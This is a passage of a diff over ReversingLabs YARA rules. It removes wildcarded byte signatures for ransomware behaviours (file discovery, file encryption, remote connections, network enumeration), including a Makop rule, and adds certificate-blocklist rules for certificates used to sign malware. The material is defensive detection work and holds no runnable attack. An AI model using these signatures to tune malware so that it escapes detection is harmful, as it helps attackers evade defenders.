?? 8B CC 8D 85 ?? ?? ?? ?? 50 89 59 ?? - 89 59 ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 - } - $remote_connection_p3 = { - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 83 EE ?? 75 ?? 8B B5 ?? ?? ?? ?? 8D 46 ?? 83 F8 ?? 77 ?? 68 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 6A ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 0F 43 85 ?? ?? ?? ?? 50 68 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 59 59 89 5D ?? 89 7D ?? 88 9D ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 - 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 89 45 ?? 8D 45 ?? C6 45 ?? ?? 50 E8 ?? ?? ?? ?? 59 8B - F0 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? 89 7D ?? 88 5D ?? E8 ?? ?? ?? - ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 ?? - E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF 35 ?? - ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 - } - $remote_connection_p4 = { - 89 5D ?? 89 7D ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D - ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? 50 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? - ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 51 51 8B CC 89 65 ?? 8D 45 ?? C7 85 ?? ?? ?? - ?? ?? ?? ?? ?? 50 8D 45 ?? 89 4D ?? 50 E8 ?? ?? ?? ?? 83 EC ?? C6 45 ?? ?? 8B CC 6A - ?? 89 59 ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? ?? ?? ?? 8D 45 ?? C6 45 - ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D - ?? E8 ?? ?? ?? ?? 8B 75 ?? 85 F6 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 84 C0 0F 85 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 0F 43 85 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 50 53 8D - 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 85 ?? ?? ?? ?? 8B 75 ?? 0F 43 85 ?? ?? - ?? ?? 6A ?? 6A ?? 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 F8 ?? 74 ?? 40 8D 8D ?? ?? ?? ?? - 50 E8 ?? ?? ?? ?? 8B 75 ?? 56 E8 ?? ?? ?? ?? 59 53 FF 75 ?? 8D 8D ?? ?? ?? ?? A3 ?? - ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 4D ?? A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 1C 01 E8 ?? ?? - ?? ?? EB ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? A3 ?? ?? ?? ?? 59 8B 75 ?? - 8D 4D ?? C6 45 ?? ?? FF 76 ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? 89 70 ?? 8B 45 ?? - 89 30 8B 45 ?? 89 70 ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 58 50 68 ?? ?? ?? ?? 83 EC ?? 89 - } - $remote_connection_p5 = { - 5D ?? 8B CC FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B F8 6A ?? 58 - FF 35 ?? ?? ?? ?? 85 FF 0F 44 F8 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 59 6A ?? 5E 6A ?? 68 - ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? 89 75 ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? - C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? 50 83 C1 ?? E8 - ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? - ?? ?? ?? 8D 4D ?? 89 5D ?? 89 75 ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 - 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? 50 83 C1 ?? E8 ?? ?? - ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 59 8B F0 6A ?? - 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? C7 45 ?? ?? ?? ?? ?? 88 5D ?? E8 ?? ?? - ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 - ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 45 - ?? 50 E8 ?? ?? ?? ?? 59 8B F0 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? 89 5D ?? C7 - 45 ?? ?? ?? ?? ?? 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D - ?? E8 ?? ?? ?? ?? 8B 4D ?? 56 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D - ?? C6 45 ?? ?? E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 - ?? 8B F0 6A ?? 58 6A ?? 5F 6A ?? 68 ?? ?? ?? ?? 8D 4D ?? 88 45 ?? 89 5D ?? 89 7D ?? - 88 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? C6 45 ?? ?? 50 8D 45 ?? 50 8D 4D ?? E8 ?? ?? ?? ?? - 8B 4D ?? 56 83 C1 ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 - ?? ?? ?? ?? 51 51 8B CC 89 65 ?? 8D 45 ?? 89 4D ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 - EC ?? C6 45 ?? ?? 8B CC 6A ?? 89 59 ?? 89 79 ?? 68 ?? ?? ?? ?? 88 19 E8 - } - $encrypt_files_p1 = { - 8B FB 89 5D ?? 89 7D ?? 89 5D ?? 8B 85 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? C6 45 ?? ?? 89 - 45 ?? 3B F0 74 ?? 56 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 3B DF 74 ?? - 8B 08 89 0F 8B 48 ?? 89 4F ?? 83 20 ?? 83 60 ?? ?? 83 C7 ?? 89 7D ?? EB ?? 50 57 8D - 4D ?? E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 83 7D ?? ?? C6 45 ?? ?? 0F 85 ?? ?? ?? ?? 6A - ?? 58 03 F0 3B 75 ?? 75 ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 8B B5 ?? ?? ?? ?? - C6 45 ?? ?? 8B 06 89 45 ?? EB ?? 8D 48 ?? 8D 41 ?? 50 51 68 ?? ?? ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? C6 45 ?? ?? 3B DF 74 ?? 8B 08 89 0F 8B 48 ?? 89 4F ?? 83 20 ?? 83 60 ?? - ?? 83 C7 ?? 89 7D ?? EB ?? 50 57 8D 4D ?? E8 ?? ?? ?? ?? 8B 5D ?? 8B 7D ?? 83 7D ?? - ?? C6 45 ?? ?? 0F 85 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 45 ?? 3B C6 75 ?? 8B 75 - ?? EB ?? 83 7E ?? ?? 74 ?? 8B CE E8 ?? ?? ?? ?? 83 C6 ?? 3B F7 75 ?? 0F 57 C0 68 ?? - ?? ?? ?? 66 0F 13 45 ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 2B 05 ?? ?? ?? ?? 6A ?? 59 99 - F7 F9 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 8B 1D ?? ?? ?? ?? 8B - 75 ?? 8B 7D ?? 89 45 ?? 3B D8 74 ?? 83 EC ?? 8B CC 53 83 61 ?? ?? 83 61 ?? ?? E8 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 03 F8 83 D6 ?? 6A ?? 58 03 D8 3B 5D ?? 75 ?? 0F AC - F7 ?? C1 EE ?? 56 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 83 C4 ?? 8B 35 - ?? ?? ?? ?? EB ?? 83 7E ?? ?? 8B C6 72 ?? 8B 06 6A ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 83 C4 ?? 6A ?? 58 03 F0 3B F7 75 ?? 68 ?? ?? ?? ?? E8 - } - $encrypt_files_p2 = { - B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 EC ?? ?? ?? ?? 53 56 8B 75 ?? 8D 8D ?? ?? ?? ?? 57 - 56 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 33 DB 50 8D 45 ?? 89 5D ?? 50 E8 ?? ?? ?? ?? 59 - 59 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8B CC 6A ?? 89 59 ?? C7 41 - ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 - ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? 8D 4D ?? 8A D8 E8 ?? ?? ?? ?? 84 DB 74 ?? 33 DB E9 ?? - ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? ?? 59 59 85 - C0 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 0F 43 45 ?? 50 E8 ?? ?? ?? - ?? 59 59 85 C0 0F 84 ?? ?? ?? ?? 83 EC ?? 33 DB 8B CC 89 5D ?? 56 E8 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? 89 45 ?? B9 ?? ?? ?? ?? BF ?? ?? ?? ?? 3B C1 0F 42 C8 3B C7 89 - 4D ?? 0F 42 F8 89 7D ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 56 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 39 9D ?? ?? ?? ?? 75 ?? 83 EC ?? 8B CC 56 E8 ?? ?? ?? - ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 7E ?? ?? C6 45 ?? ?? 72 ?? 8B 36 E8 - ?? ?? ?? ?? FF 30 E8 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D - ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 77 ?? 56 E8 ?? ?? ?? ?? 56 89 45 ?? E8 ?? ?? ?? - ?? 8B 4D ?? 56 53 51 89 45 ?? E8 ?? ?? ?? ?? 56 53 FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? - 83 C4 ?? 89 5D ?? 8B D3 85 C0 0F 84 ?? ?? ?? ?? 8B C8 2B CA 39 4D ?? 8B C1 8B F1 0F - 46 45 ?? 3B F9 89 45 ?? 0F 46 F7 8B 7D ?? 2B CE 89 75 ?? 39 4D ?? 0F 46 4D ?? 89 4D - ?? 85 FF 75 ?? 53 56 FF 75 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 0C 3E 8B - } - $encrypt_files_p3 = { - C4 89 4D ?? 89 08 8D 8D ?? ?? ?? ?? 89 58 ?? 89 58 ?? 89 58 ?? 89 58 ?? 89 58 ?? E8 - ?? ?? ?? ?? 53 FF 75 ?? 8D 8D ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 FF 75 - ?? 8D 8D ?? ?? ?? ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 EC ?? 8B D4 8B D8 - 33 C0 03 CF 89 0A 8D 8D ?? ?? ?? ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? 89 42 ?? E8 - ?? ?? ?? ?? 6A ?? FF 75 ?? 8D 8D ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 8B 7D ?? 2B 75 ?? 03 - 7D ?? 56 57 E8 ?? ?? ?? ?? 59 59 6A ?? 56 57 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 - ?? FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? 01 45 ?? 53 E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? 83 C4 ?? 8B 40 ?? 8B 84 05 ?? ?? ?? ?? C1 E8 ?? A8 ?? 74 ?? 83 EC ?? - 8B CC FF 75 ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 83 7E ?? ?? - C6 45 ?? ?? 72 ?? 8B 36 E8 ?? ?? ?? ?? FF 30 E8 ?? ?? ?? ?? 56 50 68 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 8B 7D ?? - 89 55 ?? 6A ?? 5B 3B D0 0F 82 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? - E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 59 59 FF 75 ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 EC - ?? C6 45 ?? ?? 8B CC 6A ?? 89 59 ?? C7 41 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 88 19 E8 ?? - ?? ?? ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 78 ?? ?? 8B 48 ?? C6 45 ?? ?? 72 ?? - 8B 00 51 50 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? - 8D 45 ?? 0F 43 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8B CC 50 89 59 ?? - 89 59 ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4D ?? B3 ?? E8 ?? ?? ?? ?? 8D 8D - ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? FF 75 ?? 56 E8 ?? ?? ?? ?? 59 59 8A D8 8D 4D ?? E8 - ?? ?? ?? ?? 8B 4D ?? 8A C3 5F 5E 64 89 0D ?? ?? ?? ?? 5B C9 C3 - } - $find_files = { - 8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 2B CA 83 C8 ?? 57 8B 7D ?? - 41 2B C7 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? - ?? ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? - FF 75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 4D ?? - 56 E8 ?? ?? ?? ?? 6A ?? 8B F0 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 C0 50 - 50 50 50 50 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 - 89 45 ?? 8B 4D ?? 53 8B 5D ?? 56 8B 75 ?? 57 89 B5 ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74 - ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 53 E8 ?? ?? ?? ?? 59 59 8B C8 3B CB 75 ?? 8A 11 80 FA - ?? 75 ?? 8D 43 ?? 3B C8 74 ?? 56 33 FF 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 FF - 80 FA ?? 74 ?? 80 FA ?? 74 ?? 80 FA ?? 74 ?? 8B C7 EB ?? 33 C0 40 0F B6 C0 2B CB 41 - F7 D8 68 ?? ?? ?? ?? 1B C0 23 C1 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50 E8 ?? ?? - ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 57 57 57 50 57 53 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? - ?? ?? ?? 83 FE ?? 75 ?? 50 57 57 53 E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 83 FE ?? 74 ?? 56 - FF 15 ?? ?? ?? ?? 8B C7 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? - 2B 08 C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 - 74 ?? 80 F9 ?? 75 ?? 80 BD ?? ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? - ?? 85 C0 8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B - C8 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 - ?? E9 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ( all of ($encrypt_files_p*)) and ( all of ($remote_connection_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xingning Dexin Network Technology Co., Ltd." and pe.signatures[i].serial=="61:fe:6f:00:bd:79:68:42:10:53:40:50:ff:46:bc:92" and 1512000000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Makop : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_0323Cc4E38735B0E6Efba76Ea25C73B7 : INFO FILE { meta: - description = "Yara rule that detects Makop ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9b7d42f3-0417-5228-8b25-244224cbc414" - date = "2020-10-30" - modified = "2020-10-30" + id = "0f3889d5-fb57-5745-999e-7dff0ddf7ee9" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Makop.yara#L1-L99" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0ff4739d32b4a775d07a5f22d551ed67025681d4986e4404c9a01ad4078468f3" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14260-L14276" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "48bda7f61c9705ae70add3940f10d65fc7f7a776cec91a244f0e5bde07303831" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Makop" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_p1 = { - 8D 54 24 ?? 52 56 FF 15 ?? ?? ?? ?? 56 8B F8 6A ?? 89 7C 24 ?? FF 15 ?? ?? ?? ?? 50 - FF 15 ?? ?? ?? ?? 83 FF ?? 75 ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 - C4 ?? 5F 5E 5B 8B E5 5D C3 33 F6 89 74 24 ?? EB ?? 8D A4 24 ?? ?? ?? ?? 8D 64 24 ?? - 66 8B 44 24 ?? 66 85 C0 0F 84 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 66 8B 44 24 ?? 66 85 C0 - 0F 84 ?? ?? ?? ?? 66 3D ?? ?? 75 ?? 66 83 7C 24 ?? ?? 0F 84 ?? ?? ?? ?? 8D 44 24 ?? - EB ?? 8D 9B ?? ?? ?? ?? 66 8B 08 83 C0 ?? 66 85 C9 75 ?? 8D 54 24 ?? 2B C2 D1 F8 83 - E8 ?? 85 F6 8B F8 89 7C 24 ?? 75 ?? 8B 45 ?? 05 ?? ?? ?? ?? 03 C0 0F 84 ?? ?? ?? ?? - 50 56 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 89 44 24 ?? 8B F0 0F 84 ?? ?? ?? - ?? F6 44 24 ?? ?? 0F 84 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 38 85 FF 74 ?? 8B 1F 8D 54 24 - ?? 8B CA 2B D9 8D 49 ?? 0F B7 04 13 66 3D ?? ?? 72 ?? 66 3D ?? ?? 77 ?? 83 C0 ?? 0F - B7 C8 0F B7 02 66 3D ?? ?? 72 ?? 66 3D ?? ?? 77 ?? 83 C0 ?? 83 C2 ?? 66 85 C9 0F B7 - C0 74 ?? 66 3B C8 74 ?? 0F B7 D0 0F B7 C1 2B C2 0F 84 ?? ?? ?? ?? 8B 7F ?? 85 FF 75 - ?? 8B 7D ?? 8B 55 ?? 81 C7 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8B 4D ?? 8D 5C 4E ?? BA - ?? ?? ?? ?? BF ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8D 1C 56 8D 54 24 ?? BF ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 8B 4D ?? 8D 54 08 ?? 8B 45 ?? 52 56 50 E8 - } - $find_files_p2 = { - 83 C4 ?? E9 ?? ?? ?? ?? 8D 5C 24 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? - 80 79 ?? ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 03 FA 81 FF ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 8B - 15 ?? ?? ?? ?? C6 44 24 ?? ?? 8B 7D ?? 81 C7 ?? ?? ?? ?? 8B DE E8 ?? ?? ?? ?? 8A 44 - 24 ?? 84 C0 75 ?? 8B 55 ?? 83 C7 ?? 8D 5E ?? E8 ?? ?? ?? ?? 8A 44 24 ?? 8A C8 8B 54 - 24 ?? F6 D9 1B C9 83 E1 ?? F6 D8 8B F1 8D BE ?? ?? ?? ?? 1B C0 83 E0 ?? 83 C0 ?? 03 - 45 ?? 8D 04 42 89 44 24 ?? 8D 58 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 8D BE - ?? ?? ?? ?? 8D 44 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 85 D2 8B 74 24 ?? 8B 45 ?? 77 ?? - 3B 70 ?? 77 ?? B1 ?? EB ?? 8B 55 ?? C6 44 24 ?? ?? E9 ?? ?? ?? ?? 32 C9 88 48 ?? 8B - 4C 24 ?? F6 C1 ?? 74 ?? C6 40 ?? ?? 89 48 ?? EB ?? C6 40 ?? ?? 50 89 50 ?? 89 70 ?? - 8B 44 24 ?? 50 E8 ?? ?? ?? ?? 8B 74 24 ?? 83 C4 ?? A1 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? - 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B 54 24 ?? 8D 4C 24 ?? 51 52 FF 15 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 8B 74 24 ?? EB ?? 56 6A ?? FF 15 - ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 44 24 ?? 50 FF 15 ?? ?? ?? ?? 56 6A ?? FF 15 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 - } - $encrypt_files = { - 8B 50 ?? 8B 00 83 EC ?? 55 8B 2D ?? ?? ?? ?? 56 57 6A ?? 8B F9 8D 4C 24 ?? 51 52 50 - 53 FF D5 85 C0 0F 84 ?? ?? ?? ?? 8B 57 ?? 8B 47 ?? 33 F6 56 8D 4C 24 ?? 51 52 50 53 - FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 44 24 ?? 85 C0 75 ?? B0 ?? 5F 5E 5D 83 - C4 ?? C3 3B 47 ?? 73 ?? 8B C8 83 E1 ?? 74 ?? BE ?? ?? ?? ?? 2B F1 8B 4F ?? 56 03 C8 - 6A ?? 51 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 8B 4F ?? 03 C6 50 8D 54 24 ?? 52 51 6A - ?? 6A ?? 89 44 24 ?? 8B 44 24 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 8B 4C 24 ?? 8B 54 24 ?? 6A ?? 6A ?? 51 52 53 FF D5 85 C0 74 ?? 8B 4C 24 ?? 8B 57 ?? - 8B 3D ?? ?? ?? ?? 6A ?? 8D 44 24 ?? 50 03 CE 51 52 53 FF D7 85 C0 74 ?? 8B 44 24 ?? - 8D 0C 30 8B 44 24 ?? 3B C1 72 ?? 01 44 24 ?? 8B 44 24 ?? 8B 50 ?? 8B 00 83 54 24 ?? - ?? 6A ?? 6A ?? 52 50 53 FF D5 85 C0 74 ?? 6A ?? 8D 4C 24 ?? 51 6A ?? 8D 54 24 ?? 52 - 53 FF D7 85 C0 74 ?? 83 7C 24 ?? ?? 0F 83 ?? ?? ?? ?? 5F 5E 32 C0 5D 83 C4 ?? C3 - } - $enum_network_resources = { - 55 8B EC 83 E4 ?? 83 EC ?? 53 56 57 68 ?? ?? ?? ?? 6A ?? C7 44 24 ?? ?? ?? ?? ?? C7 - 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 8B F0 85 F6 89 74 24 ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 7D ?? 8D 44 24 ?? 50 51 6A ?? - 6A ?? 57 E8 ?? ?? ?? ?? 85 C0 74 ?? 57 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B - 7D ?? 68 ?? ?? ?? ?? 6A ?? 56 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B 4C 24 ?? 83 C4 ?? 8D 54 24 ?? 52 56 8D 44 24 ?? 50 51 E8 ?? ?? ?? ?? 85 - C0 0F 85 ?? ?? ?? ?? 8B 45 ?? 85 C0 75 ?? 8B 54 24 ?? 8B 45 ?? 52 50 EB ?? 8B 4C 24 - ?? 8B 50 ?? 51 52 E8 ?? ?? ?? ?? 33 DB 83 C4 ?? 39 5C 24 ?? 76 ?? 83 C6 ?? 8D 49 ?? - 8B 46 ?? 85 C0 8B C8 75 ?? B9 ?? ?? ?? ?? 8B 46 ?? 85 C0 75 ?? B8 ?? ?? ?? ?? 51 8B - 0E 51 50 E8 ?? ?? ?? ?? 8B 46 ?? 83 C4 ?? A8 ?? 74 ?? 8B 56 ?? 85 D2 74 ?? 85 FF 7E - ?? 8B 45 ?? 85 C0 74 ?? 8B 40 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 55 